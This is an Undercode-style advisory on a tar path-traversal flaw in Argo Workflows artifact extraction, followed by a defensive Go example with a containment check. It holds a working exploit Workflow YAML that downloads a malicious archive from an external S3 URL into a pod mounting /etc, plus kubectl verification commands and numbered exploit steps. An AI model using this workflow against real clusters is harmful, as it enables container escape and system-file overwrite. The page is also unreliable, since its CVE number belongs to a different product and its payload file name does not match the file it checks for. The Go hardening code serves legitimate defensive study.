Argo Workflows, Path Traversal, CVE-2022-41352 (Critical)


The vulnerability is in the `untar()` function used during artifact extraction. When extracting a tar.gz archive, the function computes each entry's final path as `filepath.Join(dest, filepath.Clean(header.Name))`. An attacker can craft an archive entry whose name is ../../../../../../../../../..//mainctrfs/etc/zipslip-poc. `filepath.Clean()` normalizes this name but does not strip its leading `..` components, so when the result is joined onto the intended base directory (/work/tmp) it resolves to an absolute path outside it (/mainctrfs/etc/zipslip-poc); the base directory is effectively ignored and the file is written to that absolute path on the filesystem. Because a shared volume mount mirrors the wait container's `/mainctrfs/etc` to the main container's /etc, this allows arbitrary file creation in critical system directories, bypassing container isolation.
Platform: Argo Workflows
Version: < 3.4.5
Vulnerability: Path Traversal
Severity: Critical

Date: 2022-10-24

Prediction: 2022-11-14

What Undercode Say:

# Find the latest Workflow and its Pod
NS=default
WF=$(kubectl get wf -n "$NS" --sort-by=.metadata.creationTimestamp --no-headers | awk 'END{print $1}')
POD=$(kubectl get pod -n "$NS" -l workflows.argoproj.io/workflow="$WF" --no-headers | awk 'END{print $1}')
# Connect to the main container to check whether the file landed in /etc
kubectl exec -it -n "$NS" "$POD" -c main -- bash
# Inside the main container:
cd /etc/
ls -l zipslip-ok.txt
cat zipslip-ok.txt
exploit.yaml
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
  generateName: zipslip-
spec:
  entrypoint: main
  templates:
  - name: main
    container:
      image: ubuntu:22.04
      command: ["sh"]
      args: ["-c", "echo 'Starting container'; sleep 3000"]
      volumeMounts:
      - name: etcvol
        mountPath: /etc
    inputs:
      artifacts:
      - name: evil
        path: /work/tmp
        archive:
          tar: {}
        http:
          url: "https://zipslip-s3.s3.amazonaws.com/etc-poc.tgz"
  volumes:
  - name: etcvol
    emptyDir: {}

How to Exploit:

Create malicious tar.gz

Upload to S3

Deploy malicious Workflow

Execute workflow

File written to /etc

Protection from this CVE

Update Argo Workflows

Validate artifact paths

Use security policies
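As an added example (not Argo's own code), the Go program below reproduces the join pattern from the description, `filepath.Join(dest, filepath.Clean(header.Name))`, against a constructed in-memory archive, and shows the containment check that the "Validate artifact paths" recommendation amounts to: every resolved path must be dest itself or lie below it before anything is written. The archive contents, the `naiveJoin`, `safeJoin` and `extractTar` names, and the temporary extraction directory are assumptions of this example.

```go
package main

import (
	"archive/tar"
	"bytes"
	"errors"
	"fmt"
	"io"
	"os"
	"path/filepath"
	"strings"
)

// ErrOutsideDest is returned for an archive entry whose resolved path would
// land outside the extraction directory.
var ErrOutsideDest = errors.New("tar entry resolves outside destination directory")

// naiveJoin mirrors the pattern described on the page: the cleaned entry name is
// joined onto dest with no check that the result stays under dest. Leading ".."
// components survive Clean and climb out of dest inside Join.
func naiveJoin(dest, name string) string {
	return filepath.Join(dest, filepath.Clean(name))
}

// safeJoin is the hardened form: it joins exactly as before, then refuses any
// result that is neither dest itself nor a descendant of dest.
func safeJoin(dest, name string) (string, error) {
	dest = filepath.Clean(dest)
	target := filepath.Join(dest, filepath.Clean(name))
	if target != dest && !strings.HasPrefix(target, dest+string(os.PathSeparator)) {
		return "", fmt.Errorf("%w: %q -> %q", ErrOutsideDest, name, target)
	}
	return target, nil
}

// extractTar writes regular files and directories from r under dest. Entries
// that fail the containment check are recorded in rejected and skipped.
// Links and device nodes are skipped too: a link target is another path that
// would need the same containment reasoning.
func extractTar(r io.Reader, dest string) (written, rejected []string, err error) {
	tr := tar.NewReader(r)
	for {
		hdr, nerr := tr.Next()
		if nerr == io.EOF {
			return written, rejected, nil
		}
		if nerr != nil {
			return written, rejected, nerr
		}
		target, jerr := safeJoin(dest, hdr.Name)
		if jerr != nil {
			rejected = append(rejected, hdr.Name) // audit-log candidate
			continue
		}
		switch hdr.Typeflag {
		case tar.TypeDir:
			if err := os.MkdirAll(target, 0o755); err != nil {
				return written, rejected, err
			}
		case tar.TypeReg:
			if err := os.MkdirAll(filepath.Dir(target), 0o755); err != nil {
				return written, rejected, err
			}
			f, err := os.OpenFile(target, os.O_CREATE|os.O_WRONLY|os.O_TRUNC, os.FileMode(hdr.Mode)&0o777)
			if err != nil {
				return written, rejected, err
			}
			_, err = io.Copy(f, tr)
			f.Close()
			if err != nil {
				return written, rejected, err
			}
			written = append(written, target)
		default:
			rejected = append(rejected, hdr.Name)
		}
	}
}

// buildSampleArchive constructs (in memory, for this example only) a tar with
// one traversal entry named as on the page and one benign entry.
func buildSampleArchive() []byte {
	var buf bytes.Buffer
	tw := tar.NewWriter(&buf)
	entries := []struct{ name, body string }{
		{"../../../../../../../../../..//mainctrfs/etc/zipslip-poc", "traversal payload (constructed)\n"},
		{"data/hello.txt", "benign artifact content (constructed)\n"},
	}
	for _, e := range entries {
		hdr := &tar.Header{Name: e.name, Mode: 0o644, Size: int64(len(e.body)), Typeflag: tar.TypeReg}
		if err := tw.WriteHeader(hdr); err != nil {
			panic(err)
		}
		if _, err := tw.Write([]byte(e.body)); err != nil {
			panic(err)
		}
	}
	if err := tw.Close(); err != nil {
		panic(err)
	}
	return buf.Bytes()
}

func main() {
	dest, err := os.MkdirTemp("", "untar-demo-") // stands in for /work/tmp
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(dest)
	written, rejected, err := extractTar(bytes.NewReader(buildSampleArchive()), dest)
	if err != nil {
		panic(err)
	}
	fmt.Println("written:", written)
	fmt.Println("rejected:", rejected)
	fmt.Println("naive join would have produced:", naiveJoin("/work/tmp", rejected[0]))
}
```

The check is a string-prefix test on the already-cleaned join result, which is why `dest` is cleaned first and the separator is appended: otherwise `/work/tmp2` would pass as a child of `/work/tmp`. An absolute entry name such as `/etc/passwd` is not rejected, because `filepath.Join` keeps it under `dest` (`/work/tmp/etc/passwd`); only names whose `..` components climb above `dest` are refused.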

Impact:

Container isolation bypass

System file overwrite

Privilege escalation potential

Persistent access risk


Sources:

Reported By: github.com
Extra Source Hub:
Undercode
